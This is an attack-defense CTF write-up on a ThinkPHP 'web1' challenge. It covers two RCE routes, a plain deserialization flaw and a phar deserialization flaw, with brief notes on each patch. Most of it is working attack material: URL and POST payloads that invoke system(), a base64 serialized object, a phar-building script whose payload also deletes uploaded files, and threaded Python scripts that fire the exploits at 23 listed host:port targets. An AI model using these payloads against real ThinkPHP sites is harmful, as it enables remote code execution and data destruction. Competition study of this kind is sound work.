
web1

For this challenge I found four vulnerabilities in total.

ThinkPHP5 RCE 1
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /flag

This one can be exploited directly; the fix is as follows.

Adding a regex filter at line 375 of App.php is enough to fix it. This is the official fix; since I am fairly familiar with ThinkPHP, I simply applied the official method.

ThinkPHP5 RCE 2
s=cat /flag&_method=__construct&method=&filter[]=system

This one passes its values via POST. I did not find an official fix for it, but in practice once the first one is fixed this one is fixed as well; to be safe I added a second layer anyway, with a crude patch in Request.php.

Deserialization 1

The chain is very simple; in fact there is no chain at all, it can be used directly, right in the entry file index.php.

The simple deserialization point itself is in Index.php.

For the fix I just added a regex replacement that strips every letter, which makes the input useless here. Thinking about it, though, this approach is no better than simply deleting the code.

Batch exploitation script

```python
import requests
import re
import threading

# One target per line: the same host, one port per team instance.
iptables = '''39.100.119.37:10180
39.100.119.37:10380
39.100.119.37:10480
39.100.119.37:10580
39.100.119.37:10680
39.100.119.37:10780
39.100.119.37:10880
39.100.119.37:10980
39.100.119.37:11080
39.100.119.37:11180
39.100.119.37:11280
39.100.119.37:11380
39.100.119.37:11480
39.100.119.37:11580
39.100.119.37:11680
39.100.119.37:11780
39.100.119.37:11880
39.100.119.37:11980
39.100.119.37:12080
39.100.119.37:12180
39.100.119.37:12280
39.100.119.37:12380
39.100.119.37:12480'''.split('\n')


def find_flag(data):
    # Return the first flag{...} found in the response, or None if there is none.
    tmp = re.findall("flag{(.*?)}", data)
    for i in tmp:
        return 'flag{' + i + '}'
    return None


def ip_log(flag):
    # Append each captured flag to flag1.txt.
    with open('flag1.txt', 'a') as f:
        f.write(flag + "\n")


def attack(ip):
    # The a= parameter is the base64-encoded serialized Core object consumed by the unse action.
    url2 = "http://" + ip + "/?s=index/index/unse&a=Tzo0OiJDb3JlIjoxOntzOjQ6ImRhdGEiO3M6MjA6InN5c3RlbSgnY2F0IC9mbGFnJyk7Ijt9"
    response = requests.get(url2)
    flag = find_flag(response.text)
    if flag:
        ip_log(flag)
    print(ip, ":", flag)


for ip in iptables:
    t = threading.Thread(target=attack, args=(ip,))
    t.start()
```
Phar deserialization

There is an upload function and a file-read function; it does not take much thought to see that this is phar deserialization.

For the fix I simply added a filter that blocks the phar protocol.
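As an added illustration (not the author's patch and not ThinkPHP's own code), the two defensive checks described above, the controller-name regex for App.php and the guard for the file-read endpoint, written as standalone PHP functions. The regex is the pattern upstream ThinkPHP added; the upload directory passed in is a placeholder.

```php
<?php
// Added example: hardening checks matching the fixes described in the writeup.
// Assumptions: the regex equals the upstream ThinkPHP App.php check; the
// upload directory is a placeholder supplied by the caller.

// 1. Controller-name allowlist. A route segment such as "think\app" contains
//    a backslash, which this pattern rejects, so the dispatcher never
//    resolves a namespaced class from user input.
function controllerNameIsValid(string $controller): bool
{
    return (bool) preg_match('/^[A-Za-z](\w|\.)*$/', $controller);
}

// 2. File-read guard. Rather than stripping the literal "phar://" (stream
//    wrappers are case-insensitive and a blacklist is easy to get wrong),
//    reject anything with a URL scheme and resolve the remaining relative
//    name inside the upload directory.
function resolveUploadPath(string $userPath, string $uploadDir): ?string
{
    // Any scheme prefix (phar://, php://, ...) is refused outright.
    if (preg_match('#^[a-z][a-z0-9+.-]*://#i', $userPath)) {
        return null;
    }
    $base = realpath($uploadDir);
    $full = realpath($uploadDir . '/' . $userPath);
    if ($base === false || $full === false) {
        return null;
    }
    // realpath() collapses "../", so a prefix check keeps us inside $uploadDir.
    if (strncmp($full, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $full;
}

// Self-check with constructed inputs (requires zend.assertions=1).
assert(controllerNameIsValid('Index') === true);
assert(controllerNameIsValid('think\app') === false);
assert(resolveUploadPath('phar://uploads/x.gif', '/tmp') === null);
assert(resolveUploadPath('PHAR://uploads/x.gif', '/tmp') === null);
```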

Phar script

```php
<?php
// Building a phar requires phar.readonly=Off in php.ini, otherwise Phar::setMetadata() throws.
class Core
{
    public $data;

    public function __construct()
    {
        $this->data = "system('cat /flag;rm rm /var/www/html/public/uploads/20200314/*');";
    }
}

@unlink("yds.phar");
$phar = new Phar("yds.phar");
$phar->startBuffering();
// GIF header in the stub so the file passes the upload's image check.
$phar->setStub("GIF89a<?php __HALT_COMPILER(); ?>");
// The object is serialized into the phar metadata.
$phar->setMetadata(new Core());
$phar->addFromString("yds.txt", "yds_is_so_beautiful");
$phar->stopBuffering();
rename('yds.phar', 'yds.gif');
```

Batch script

```python
import requests
import re
import threading
from requests import session

# One target per line: the same host, one port per team instance.
iptables = '''39.100.119.37:10180
39.100.119.37:10380
39.100.119.37:10480
39.100.119.37:10580
39.100.119.37:10680
39.100.119.37:10780
39.100.119.37:10880
39.100.119.37:10980
39.100.119.37:11080
39.100.119.37:11180
39.100.119.37:11280
39.100.119.37:11380
39.100.119.37:11480
39.100.119.37:11580
39.100.119.37:11680
39.100.119.37:11780
39.100.119.37:11880
39.100.119.37:11980
39.100.119.37:12080
39.100.119.37:12180
39.100.119.37:12280
39.100.119.37:12380
39.100.119.37:12480'''.split('\n')


def find_flag(data):
    # Return the first flag{...} found in the response, or None if there is none.
    tmp = re.findall("flag{(.*?)}", data)
    for i in tmp:
        return 'flag{' + i + '}'
    return None


def ip_log(flag):
    # Append each captured flag to flag1.txt.
    with open('flag1.txt', 'a') as f:
        f.write(flag + "\n")


def attack(ip):
    # Upload the phar disguised as a GIF, then trigger it through the file-read endpoint.
    url1 = "http://" + ip + "/index.php/Index/index/upload"
    s = session()
    with open('yds.gif', 'rb') as img:
        response = s.post(url1, files={'image': img})
    # The upload response contains the stored file name; reuse it with the phar:// wrapper.
    url2 = "http://" + ip + "/?file=phar://uploads/" + response.text.split('.gif')[0] + '.gif'
    response2 = s.get(url2)
    flag = find_flag(response2.text)
    if flag:
        ip_log(flag)
    print(ip, ":", flag)


for ip in iptables:
    t = threading.Thread(target=attack, args=(ip,))
    t.start()
```
